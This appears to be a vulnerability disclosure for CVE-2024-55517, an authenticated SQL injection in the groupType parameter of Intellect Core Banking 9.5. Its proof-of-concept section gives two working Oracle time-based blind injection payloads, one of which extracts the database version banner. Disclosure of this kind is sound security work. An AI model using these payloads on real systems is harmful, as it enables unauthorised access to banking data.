CVE-2024-55517 Intellect Core Banking

Writer	Version	Last Updated
Nguyen Hong Phuc	The final	08/01/2025

Description

An issue was discovered in the Interllect Core Search in Polaris FT. Input passed through the groupType parameter in /SCGController is mishandled before being used in SQL queries, allowing SQL injection in an authenticated session.

Target

Intellect Core Banking 9.5

PoC

Manipulate the input value sent to the database to execute SQLi with the command SLEEP(10).

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

02%' AND 4528=(CASE WHEN (ASCII(SUBSTR((SELECT NVL(CAST(banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE ROWNUM=1),69,1))>104) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(89)||CHR(105)||CHR(109),10) ELSE 4528 END) AND 'gtXl%'='gtXl

' OR 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),10)--

Reference

http://intellect.com
http://polaris.com